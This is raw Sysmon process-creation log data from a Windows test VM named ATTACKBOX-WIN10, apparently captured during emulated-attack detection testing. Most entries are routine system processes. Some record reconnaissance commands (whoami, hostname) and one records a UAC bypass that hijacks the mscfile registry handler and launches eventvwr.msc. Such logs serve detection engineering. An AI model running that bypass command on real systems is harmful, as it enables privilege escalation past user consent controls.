-ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C764-6552-A402-000000001E00}2856C:\Windows\System32\cmd.exe"cmd.exe" /c reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f & cmd.exe /c eventvwr.mscATTACKBOX-WIN10\VICTIM 154100x8000000000000000661618Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:32.172{51A89197-C764-6552-A402-000000001E00}2856C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "C:\Windows\System32\cmd.exe" /f & cmd.exe /c eventvwr.mscC:\Users\VICTIM\AppData\Local\Temp\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000661518Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:29.428{51A89197-C761-6552-A302-000000001E00}3288C:\Windows\System32\whoami.exe10.0.17134.1 (WinBuild.160101.0800)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\DetectionTesting\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=79AAE5558E036F17218B21D27216C9EBFE313BE1,MD5=AA18BE1AD24DE09417C1A7459F5C1701,SHA256=59D6065C2DD2D1466EF8BAE087197F1222C7D7EFF84A12C8DB74C42F4EFBEB5D,IMPHASH=7FF0758B766F747CE57DFAC70743FB88{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000661492Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:29.395{51A89197-C761-6552-A202-000000001E00}5140C:\Windows\System32\HOSTNAME.EXE10.0.17134.1 (WinBuild.160101.0800)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\DetectionTesting\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=B0CFFB96BE88857EA65D2A493D82AB1456DB706C,MD5=80DE10195A11A3E7146EA7C38A67F0E6,SHA256=2BA1305C786991DD2261DDEDA61D74057383D84327CE540B080D8842B21B35A8,IMPHASH=5CD891320C666621E9783444DB8CBA78{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000661423Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:18.485{51A89197-C756-6552-A102-000000001E00}5764C:\Windows\System32\HOSTNAME.EXE10.0.17134.1 (WinBuild.160101.0800)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\DetectionTesting\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=B0CFFB96BE88857EA65D2A493D82AB1456DB706C,MD5=80DE10195A11A3E7146EA7C38A67F0E6,SHA256=2BA1305C786991DD2261DDEDA61D74057383D84327CE540B080D8842B21B35A8,IMPHASH=5CD891320C666621E9783444DB8CBA78{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000661238Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:18.260{51A89197-C756-6552-A002-000000001E00}6876C:\Windows\System32\HOSTNAME.EXE10.0.17134.1 (WinBuild.160101.0800)Hostname APPMicrosoft® Windows® Operating SystemMicrosoft Corporationhostname.exe"C:\Windows\system32\HOSTNAME.EXE"C:\DetectionTesting\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=B0CFFB96BE88857EA65D2A493D82AB1456DB706C,MD5=80DE10195A11A3E7146EA7C38A67F0E6,SHA256=2BA1305C786991DD2261DDEDA61D74057383D84327CE540B080D8842B21B35A8,IMPHASH=5CD891320C666621E9783444DB8CBA78{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000661175Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:18.134{51A89197-C756-6552-9F02-000000001E00}5548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\VICTIM\AppData\Local\Temp\RES388A.tmp" "c:\Users\VICTIM\AppData\Local\Temp\CSC4481BFDED654486905D3FA98B5FDD6.TMP"C:\Users\VICTIM\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=76C1219AF982CDFD4C2ED915EB4AE0EE99895C01,MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{51A89197-C755-6552-9E02-000000001E00}5452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\VICTIM\AppData\Local\Temp\lpfzcwjl.cmdline"ATTACKBOX-WIN10\VICTIM 154100x8000000000000000661059Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:17.842{51A89197-C755-6552-9E02-000000001E00}5452C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.3056.0 built by: NET472REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\VICTIM\AppData\Local\Temp\lpfzcwjl.cmdline"C:\Users\VICTIM\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=311F2313016303A7B0296FCFA1E821905FF84304,MD5=B46100977911A0C9FB1C3E5F16A5017D,SHA256=DB58611DD100D2280FAD9BB38982FC287A46C42DD8C2F5C964C5796AB9371FE6,IMPHASH=9C5140449778B9B7CEF1476457A218C0{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000659828Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:08.011{51A89197-C74C-6552-9D02-000000001E00}4580C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKBOX-WIN10\VICTIM 154100x8000000000000000659631Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:07.653{51A89197-C74B-6552-9C02-000000001E00}6296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.17134.1 (WinBuild.160101.0800)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\VICTIM\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=1B3B40FBC889FD4C645CC12C85D0805AC36BA254,MD5=95000560239032BC68B4C2FDFCDEF913,SHA256=D3F8FADE829D2B7BD596C4504A6DAE5C034E789B6A3DEFBE013BDA7D14466677,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F{51A89197-BEB9-6552-C600-000000001E00}836C:\Windows\explorer.exe"C:\Windows\explorer.exe" /LOADSAVEDWINDOWSATTACKBOX-WIN10\VICTIM 154100x8000000000000000659168Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:07.152{51A89197-C74B-6552-9B02-000000001E00}7940C:\Windows\System32\smartscreen.exe10.0.17134.677 (WinBuild.160101.0800)Windows Defender SmartScreenMicrosoft® Windows® Operating SystemMicrosoft Corporationsmartscreen.exeC:\Windows\System32\smartscreen.exe -EmbeddingC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=CD69BD3F22820ADBA4AE0B65350ED57E487CB8EA,MD5=9A16C9E1817832AC2326DF8910C3E1CC,SHA256=FE217F1B4DA18CA0B1E469C7DB6C220D00FBA9E00425F2BA25C6C5B896401BF3,IMPHASH=ED414D5B8D82565C43463FE2BEB340A4{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000659073Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:03:06.900{51A89197-C74A-6552-9A02-000000001E00}7188C:\Windows\System32\rundll32.exe10.0.17134.1 (WinBuild.160101.0800)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -EmbeddingC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=2F34CCFDD8141AEEE2E89FFB070CE239C7D00706,MD5=73C519F050C20580F8A62C849D49215A,SHA256=38847DC4C82C0775E7DAFCBC7FEA50749CDAC7B50AB8602E8FDFAD4401954C87,IMPHASH=F27A7FC3A53E74F45BE370131953896A{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000657896Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:01:49.770{51A89197-C6FD-6552-9302-000000001E00}5024C:\Windows\System32\backgroundTaskHost.exe10.0.17134.1 (WinBuild.160101.0800)Background Task HostMicrosoft® Windows® Operating SystemMicrosoft CorporationbackgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mcaC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961AppContainerSHA1=EA114FDE884B16817A7D348660EA6FA1C217D315,MD5=B7FC4A29431D4F795BBAB1FB182B759A,SHA256=48B9EB1E31B0C2418742CE07675D58C974DD9F03007988C90C1E38F217F5C65B,IMPHASH=D2ACF1CBC4A6DB14A34C687B9362D66B{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000657845Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:01:49.703{51A89197-C6FD-6552-9202-000000001E00}5348C:\Windows\System32\taskhostw.exe10.0.17134.619 (WinBuild.160101.0800)Host Process for Windows TasksMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskhostw.exetaskhostw.exe KEYROAMINGC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=70588B44FF34097B6FC6A9A3C60DB022296D401D,MD5=88E39572A5A780CACF34F3C5B1F70906,SHA256=AE95807E817CEC8BBAA328B8576AAF68D8FE082FA1C6608A0FA80F2402B8AAE0,IMPHASH=3627BE269990D67CF76A03FA55EF9A08{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000657279Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:01:48.055{51A89197-C6FC-6552-8F02-000000001E00}5948C:\Windows\System32\RuntimeBroker.exe10.0.17134.1 (WinBuild.160101.0800)Runtime BrokerMicrosoft® Windows® Operating SystemMicrosoft CorporationRuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -EmbeddingC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=12124C44EC062C96EFF72E4F87C5E6782E73ADCC,MD5=C7E36B4A5D9E6AC600DD7A0E0D52DAC5,SHA256=5C5AC5C17B10C47EFFEFF95687B6298773F74DCDB5BFA01CA185311343FDADCC,IMPHASH=7CB280A8578C9296B3E29AD28A96EF15{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000656213Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:01:42.057{51A89197-C6F6-6552-8B02-000000001E00}7744C:\Windows\System32\ipconfig.exe10.0.17134.1 (WinBuild.160101.0800)IP Configuration UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationipconfig.exeC:\Windows\system32\ipconfig /renewC:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=50A4778EB3B6002820B26D8D198A656DFE24E75B,MD5=C7FAFF418EF7AD7ABDA10A5BCF9B53EB,SHA256=9F160078947D7DAF42F02B541453AD143AEF1F60F1EB5107C4345337F7F96525,IMPHASH=2C6253F8FAA0D455F65586F8380D5C7A{51A89197-C6F4-6552-8802-000000001E00}1812C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""NT AUTHORITY\SYSTEM 154100x8000000000000000655856Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:01:41.062{51A89197-C6F5-6552-8902-000000001E00}7148C:\Windows\System32\conhost.exe10.0.17134.1 (WinBuild.160101.0800)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsNT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=8F9BC1B7D65188D0ADBDF74CCCE4EED78BF4C129,MD5=EA777DEEA782E8B4D7C7C33BBF8A4496,SHA256=04B6A35BC504401989B9E674C57C9E84D0CBDBBD9D8CE0CE83D7CECA0B7175ED,IMPHASH=63E065B05DF33ACB4D95B3DD04670B8F{51A89197-C6F4-6552-8802-000000001E00}1812C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""NT AUTHORITY\SYSTEM 154100x8000000000000000655742Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:01:40.717{51A89197-C6F4-6552-8802-000000001E00}1812C:\Windows\System32\cmd.exe10.0.17134.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\VMware\VMware Tools\resume-vm-default.bat""C:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=3CE71813199ABAE99348F61F0CAA34E2574F831C,MD5=4E2ACF4F8A396486AB4268C94A6A245F,SHA256=9A7C58BD98D70631AA1473F7B57B426DB367D72429A5455B433A05EE251F3236,IMPHASH=8542FB14699D84D7E8DA92F66145C7FE{51A89197-BE5F-6552-2E00-000000001E00}2168C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"NT AUTHORITY\SYSTEM 154100x8000000000000000655679Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:01:40.431{51A89197-C6F4-6552-8702-000000001E00}612C:\Windows\System32\taskhostw.exe10.0.17134.619 (WinBuild.160101.0800)Host Process for Windows TasksMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskhostw.exetaskhostw.exe C:\Windows\system32\wermgr.exe -uploadC:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e70SystemSHA1=70588B44FF34097B6FC6A9A3C60DB022296D401D,MD5=88E39572A5A780CACF34F3C5B1F70906,SHA256=AE95807E817CEC8BBAA328B8576AAF68D8FE082FA1C6608A0FA80F2402B8AAE0,IMPHASH=3627BE269990D67CF76A03FA55EF9A08{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000654375Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:00:58.551{51A89197-C6CA-6552-8602-000000001E00}6688C:\Windows\System32\backgroundTaskHost.exe10.0.17134.1 (WinBuild.160101.0800)Background Task HostMicrosoft® Windows® Operating SystemMicrosoft CorporationbackgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mcaC:\Windows\SystemApps\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961AppContainerSHA1=EA114FDE884B16817A7D348660EA6FA1C217D315,MD5=B7FC4A29431D4F795BBAB1FB182B759A,SHA256=48B9EB1E31B0C2418742CE07675D58C974DD9F03007988C90C1E38F217F5C65B,IMPHASH=D2ACF1CBC4A6DB14A34C687B9362D66B{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000653745Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:00:57.946{51A89197-C6C9-6552-8502-000000001E00}7964C:\Windows\System32\RuntimeBroker.exe10.0.17134.1 (WinBuild.160101.0800)Runtime BrokerMicrosoft® Windows® Operating SystemMicrosoft CorporationRuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -EmbeddingC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=12124C44EC062C96EFF72E4F87C5E6782E73ADCC,MD5=C7E36B4A5D9E6AC600DD7A0E0D52DAC5,SHA256=5C5AC5C17B10C47EFFEFF95687B6298773F74DCDB5BFA01CA185311343FDADCC,IMPHASH=7CB280A8578C9296B3E29AD28A96EF15{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000653006Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:00:57.373{51A89197-C6C9-6552-8402-000000001E00}7720C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe10.0.17134.1 (WinBuild.160101.0800)LockApp.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationLockApp.exe"C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe" -ServerName:WindowsDefaultLockScreen.AppX7y4nbzq37zn4ks9k7amqjywdat7d3j2z.mcaC:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961AppContainerSHA1=E56F862ECE36519B92FB25B4027250994080B7AF,MD5=B4A37529717E23500DAA83CB79B3F1C8,SHA256=71F7A7C7C514B487CE686855380C1E2D19DC0B049133A6B09D63BF82859AD531,IMPHASH=6333FEE3859A8D76ECD2A1896579A674{51A89197-BE59-6552-0F00-000000001E00}756C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -pNT AUTHORITY\SYSTEM 154100x8000000000000000652576Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:00:56.699{51A89197-C6C8-6552-8302-000000001E00}872C:\Windows\System32\taskhostw.exe10.0.17134.619 (WinBuild.160101.0800)Host Process for Windows TasksMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskhostw.exetaskhostw.exe KEYROAMINGC:\Windows\system32\ATTACKBOX-WIN10\VICTIM{51A89197-BE5E-6552-96D8-010000000000}0x1d8961MediumSHA1=70588B44FF34097B6FC6A9A3C60DB022296D401D,MD5=88E39572A5A780CACF34F3C5B1F70906,SHA256=AE95807E817CEC8BBAA328B8576AAF68D8FE082FA1C6608A0FA80F2402B8AAE0,IMPHASH=3627BE269990D67CF76A03FA55EF9A08{51A89197-BE5A-6552-1300-000000001E00}368C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -pNT AUTHORITY\SYSTEM 154100x8000000000000000652276Microsoft-Windows-Sysmon/OperationalAttackBox-Win10-2023-11-14 01:00:56.196{51A89197-C6C8-6552-8202-000000001E00}272C:\Windows\System32\LogonUI.exe10.0.17134.1 (WinBuild.160101.0800)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x0 /state0:0xa3fa8055 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{51A89197-BE59-6552-E703-000000000000}0x3e71SystemSHA1=0950DD0F72D2EB578A8609F82EA6D5EDBE4A96FF,MD5=3AAD3281A2953F4DDA09D7EE5BEE8BA6,SHA256=536ABC6D36A44A42C41263B0B470A5D2DB75B9291585AE4EFD94190C08C1C233,IMPHASH=B9B0B64B08B38276711093CA94348D39{51A89197-BE59-6552-0A00-000000001E00}588C:\Windows\System32\winlogon.exewinlogon.exeNT AUTHORITY\SYSTEM